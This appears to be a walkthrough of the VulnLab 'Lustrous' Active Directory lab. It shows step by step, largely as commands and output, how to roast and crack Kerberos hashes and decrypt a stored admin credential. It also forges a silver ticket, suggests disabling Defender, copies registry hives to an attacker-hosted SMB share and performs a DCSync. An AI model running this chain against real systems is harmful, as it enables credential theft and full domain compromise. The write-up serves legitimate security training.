VulnLab Lustrous
VulnLab Lustrous
Lustrous
Recon
1
2
3
4
└─$ rustscan -g -a 10.10.190.69,10.10.190.70 -r 1-65535
10.10.190.69 -> [21,53,80,88,135,139,389,443,445,464,593,636,3269,3268,3389,5985,9389]
10.10.190.70 -> [135,139,445,3389,5985]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
└─$ nmap -sC -sV -p21,53,80,88,135,139,389,443,445,464,593,636,3269,3268,3389,5985,9389 10.10.190.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 23:43 +05
Nmap scan report for 10.10.190.69
Host is up (0.090s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21 11:50AM <DIR> transfer
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-14 18:42:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Not valid before: 2021-12-26T09:46:02
|_Not valid after: 2022-12-26T00:00:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Not valid before: 2025-01-13T18:30:47
|_Not valid after: 2025-07-15T18:30:47
|_ssl-date: 2025-01-14T18:42:50+00:00; -1m20s from scanner time.
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSDC
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusDC.lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-14T18:42:11+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
| smb2-time:
| date: 2025-01-14T18:42:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.28 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
└─$ nmap -sC -sV -p135,139,445,3389,5985 10.10.190.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 23:35 +05
Nmap scan report for 10.10.190.70
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-14T18:35:12+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Not valid before: 2025-01-13T18:30:47
|_Not valid after: 2025-07-15T18:30:47
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSMS
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusMS.lustrous.vl
| DNS_Tree_Name: lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-14T18:34:32+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-01-14T18:34:34
|_ start_date: N/A
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.34 seconds
LusMS.lustrous.vl
There’s https port open, but it returns 401. But we also have FTP service running, where we can anonymously login. There we find user directories. We can try stealing hash, but it doesn’t work.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ ftp anonymous@10.10.190.69
Connected to 10.10.190.69.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21 11:50AM <DIR> transfer
226 Transfer complete.
ftp> cd transfer
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21 11:51AM <DIR> ben.cox
12-26-21 11:49AM <DIR> rachel.parker
12-26-21 11:49AM <DIR> tony.ward
12-26-21 11:50AM <DIR> wayne.taylor
226 Transfer complete.
ftp>
So let’s create user list and check if any of the users is vulnerable AS-REP Roasting
1
2
3
4
5
6
7
8
└─$ GetNPUsers.py -usersfile usernames.txt -outputfile asrep.hash -request -format hashcat -dc-ip 10.10.190.69 lustrous.vl/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$ben.cox@LUSTROUS.VL:a14ef6711f8206102adece1f066e7297$cf54c1df0a2a3f5034a422d43d675e2828857da3f6163b23bd5d019d14208f152dcf1aca65cf322d1dc76d7da3be309ef112d1185280f1b73947291cbe4c3f7ced3967c35037433ada2ef2bedc432683fa726b67193f7e310cd797337064ddd7e52fd44baf8d40bc3e6131e498aa5e1dd8c6b58256e116d02a4e0b9c654b641e6240d2995c074da096ce69c8881264ecaaf45882453f7a416a726805ba4e0f976e4e943baec72fed4b4f767a57251ae4b8293d570f4d2f3883bc8ca1560f35b0d65862f20b452f40cc9aff7ae9b8ebdc8442c33793bdaf7a7f31406e81dd1027a539afcbac97f53119ad
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
Crack it
1
2
3
4
5
6
└─$ hashcat -m 18200 -a 0 asrep.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5asrep$23$ben.cox@LUSTROUS.VL:a14ef6711f8206102adece1f066e7297$cf54c1df0a2a3f5034a422d43d675e2828857da3f6163b23bd5d019d14208f152dcf1aca65cf322d1dc76d7da3be309ef112d1185280f1b73947291cbe4c3f7ced3967c35037433ada2ef2bedc432683fa726b67193f7e310cd797337064ddd7e52fd44baf8d40bc3e6131e498aa5e1dd8c6b58256e116d02a4e0b9c654b641e6240d2995c074da096ce69c8881264ecaaf45882453f7a416a726805ba4e0f976e4e943baec72fed4b4f767a57251ae4b8293d570f4d2f3883bc8ca1560f35b0d65862f20b452f40cc9aff7ae9b8ebdc8442c33793bdaf7a7f31406e81dd1027a539afcbac97f53119ad:<REDACTED>
<SNIP>
1
2
3
└─$ nxc smb 10.10.190.69 -u 'ben.cox' -p '<REDACTED>'
SMB 10.10.190.69 445 LUSDC [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB 10.10.190.69 445 LUSDC [+] lustrous.vl\ben.cox:<REDACTED>
Let’s also check Kerberoastable users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ GetUserSPNs.py lustrous.vl/ben.cox:'<REDACTED>' -dc-ip 10.10.190.69 -request -outputfile kerb.hash
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------- -------- -------------------------- -------------------------- ----------
http/lusdc svc_web 2021-12-22 18:46:12.670282 2025-01-14 23:42:12.263803
http/lusdc.lustrous.vl svc_web 2021-12-22 18:46:12.670282 2025-01-14 23:42:12.263803
MSSQL/lusdc svc_db 2021-12-22 18:46:34.170590 <never>
MSSQL/lusdc.lustrous.vl svc_db 2021-12-22 18:46:34.170590 <never>
[-] CCache file is not found. Skipping...
Crack
1
2
3
4
5
6
└─$ hashcat -m 13100 -a 0 kerb.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$db1590764321cd59bbbf1fcf1632f806$fbe493b6e06a5d7d4bf531d3f1dbcf73f8be7076be675a61dd0aa96052ff1dc69df49983a7d2b7ad0457d6d73896d2487610999b7701660fd0d021123def972207a03023b13fa7e809bb88dbf93459766764a045894178ca852b7da7f30e6ffce2ea518878e639adfc3fecf1c53cd11c970270eb16cbffd9dd8e8a63022cea07ff6fb3196493c453091682d4c554b8c17e049ca834fcec7ed16a6aa1b00da34a5f6f0a0a048b2cca210e20b61434e30b81da35dba70a8aaee5a95a41d337f2ccddb9273f93385ad67e6893b1ee62ccd6f427982e849daca8d46d5566eddc380a7acdf50619657e0e94282cd1f7c5cad853b6e9b90a1a11e754d4faef3618da2b145a06ff7a5b7df9a64a40989d50afa2bb8e0eb2dca4d8e8ac35cf50cc39143ceb26a38d71f7fc0025ca5022cb0940a0eef1a48777f94227fa9bc82ef5148358d97aaeb0afab6a6d83f66140fe4817a11a4206ba70e09a710e3656cd75d8cec6e0d4c114ef8a7a4a799c7d3c0d558b1efd9181344bc4a8f2d01f26d8433e120fbc97f0e2cb7c37b671f01803050f770ca41360a713cc29fc6475ea1cdb2ac5b2fb649d9b32e682746a5a53f75cff3823fd1ee9daac93174f912cd5129cb17bec9ad0181bf6e97ee733beeb7f035edf859c79bae428b2a8ada78cf2a1d8b409b7a32551928b1de60cfab55eb1d5e808582c53968bec9a1f8de13bfce188edaa96ebc2c3b955bbb86e28f090eefbab049926dae9921d17862a99d295d33c9918d4e80ca9fa8d2e4aadc3ced00fcf48b824156feb89e6f65f4a1a0aaae48c60d172658c340a5989d9a5860998df464508c27c5ca474c4f9a961028275d2b13a8eeaebc512c1799fe40b0d163f81e83c46eb07678f8ed95a2330b0593f56a93bb9b8d0013d8901965342089273e8d0a2a522569603c845c821bd7b63f253d900fa0b2ac2a4d68791ddaffadf89fdc0746b0f9f4fdd0c7b665aa4951cff9010f208b6a1876b4b0788eddc268ea3dc61bffc08d997cb2b7161d53df8c637e8966af1f76b742d8414a2859186f5e9c1d30fe883f5f9236b0020fe0f2de4cdb1194c8ee6b275c5bf68df100108ad5be5ae806e839b3151fbf1dada76c0132f3284fb9b3ade63ed499b3c791c3d5d6929a07adb60dfcbdab6dc1153569d3142d56eee8cc55e52a75e34c2933e9fa17683e9520569b4384f83de92fe8312509780798142b924a2e7866d581cae2adb16564b1b98abfc6432fbc33cab0916451dc281c2c5c32bb60a8bd3deecd69cd64f7241efd72e769df2cfba56ad80f00baea3b1091f4ec6a98e12c6ec71b8da6cb0e49fe1a5141b721e6c7ccd8b8c8d25445db70a6627fdfa9a94f48aaecca172c71ef2a8785852977e86fb262f8f390a1ae4b581108381ced1f6e2cc3be3f2bb134a99984225f639162ed00cefd6521cd5c012de4cc774aad6:<REDACTED>
<SNIP>
Let’s capture domain info with bloodhound
1
└─$ bloodhound-python -d 'lustrous.vl' -u 'ben.cox' -p '<REDACTED>' -c all -ns 10.10.190.69 --zip
ben.cox
can PSRemote
We can connect to LUSMS
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -i 10.10.190.70 -u 'ben.cox' -p '<REDACTED>'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents>
We find admin.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
*Evil-WinRM* PS C:\Users\ben.cox> ls desktop
Directory: C:\Users\ben.cox\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2021 10:30 AM 1652 admin.xml
*Evil-WinRM* PS C:\Users\ben.cox> cat desktop\admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
</Props>
</Obj>
</Objs>
We can decrypt it by following:
- https://stackoverflow.com/questions/63639876/powershell-password-decrypt
- https://systemweakness.com/powershell-credentials-for-pentesters-securestring-pscredentials-787263abf9d8
- https://exploit-notes.hdks.org/exploit/cryptography/algorithm/powershell-credentials/
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\ben.cox> $EncString = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox> $SecureString = ConvertTo-SecureString $EncString
*Evil-WinRM* PS C:\Users\ben.cox> $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "LUSMS\Administrator",$SecureString
*Evil-WinRM* PS C:\Users\ben.cox> $password = echo $Credential.GetNetworkCredential().password
*Evil-WinRM* PS C:\Users\ben.cox> $password
<REDACTED>
We can connect as administrator using the creds
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -i 10.10.190.70 -u administrator -p '<REDACTED>'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
LusDC.lustrous.vl
Nothing interesting inside. Remember we had 401 error when visiting https service running on lusdc.lustrous.vl
, when we try accessing from LusMS
we receive login prompt
We can use ben.cox
credentials. Seems like it stores user notes.
During roasting attacks, we saw svc_web
user with spn http/lusdc.lustrous.vl
, which probably runs web server. We were able to crack the hash, so no we can try performing Silver-Ticket attack. To perform thi attack we need:
- NTLM hash of the service account
- Domain SID
- SPN of the service:
http/lusdc.lustrous.vl
Convert password to NTLM
1
2
3
└─$ iconv -f ASCII -t UTF-16LE <(printf "<REDACTED>") | openssl dgst -md4
MD4(stdin)= <REDACTED>
We can retrieve Domain SID using lookupsid.py
or via Powerview
’s Get-DomainSID
cmdlet or bloodhound
1
2
3
4
5
6
7
8
9
└─$ lookupsid.py lustrous/ben.cox:'<REDACTED>'@10.10.252.165
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.10.252.165
[*] StringBinding ncacn_np:10.10.252.165[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2355092754-1584501958-1513963426
<SNIP>
Then we can generate ticket and pass it to the current session using Rubeus
or mimikatz
. Note that the host has Windows Defender enabled, so either disable it/add exception path or any other way.
The final command for Rubeus
1
Rubeus.exe silver /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /service:http/lusdc.lustrous.vl /rc4:<REDACTED> /user:<USERNAME> /id:<RID> /ptt /nowrap
Or mimikatz
1
2
privilege::debug
kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /target:lusdc.lustrous.vl /service:http /rc4:<REDACTED> /user:<USERNAME>
It works
Now let’s access it via powershell by using http://lusdc.lustrous.vl/Internal
url, which contained all notes
1
Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content
Nothing useful. There’s tony.ward
who is a member of Backup Operators
group. We can check his notes
Seems like there are creds
Now we can use RegSave or reg.py
by impacket. Let’s use impacket
1
2
3
4
5
6
7
8
└─$ smbserver.py -smb2support "dump" "./"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
Retrieve secrets
1
2
3
4
5
6
└─$ reg.py lustrous/tony.ward:'<REDACTED>'@lusdc.lustrous.vl backup -o '\\10.8.4.147\dump'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saved HKLM\SAM to \\10.8.4.147\dump\SAM.save
[*] Saved HKLM\SAM to \\10.8.4.147\dump\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.4.147\dump\SECURITY.save
But it can fail due to timeout, so we can also use tool by who4m1
1
└─$ x86_64-w64-mingw32-g++ ./BackupOperators.cpp -o BackupOperators
Upload to host and run it
1
2
3
4
PS C:\windows\tasks> .\BackupOperators.exe
Dumping SAM hive to C:\windows\temp\sam.hive
Dumping SYSTEM hive to C:\windows\temp\system.hive
Dumping SECURITY hive to C:\windows\temp\security.hive
Download secrets from DC, they were saved to C:\Windows\Temp
1
2
3
4
5
6
7
8
└─$ smbclient.py lustrous/tony.ward:'<REDACTED>'@lusdc.lustrous.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
# use C$
# get windows\temp\sam.hive
# get windows\temp\system.hive
# get windows\temp\security.hive
# exit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:<REDACTED>
[*] DPAPI_SYSTEM
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
Now DCSync using DC’s hash
1
2
3
4
5
6
7
8
└─$ secretsdump.py 'lusdc$'@lusdc.lustrous.vl -hashes :<REDACTED>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
https://api.vulnlab.com/api/v1/share?id=fbb5ab2b-c29a-4d80-8649-861447fa8d9f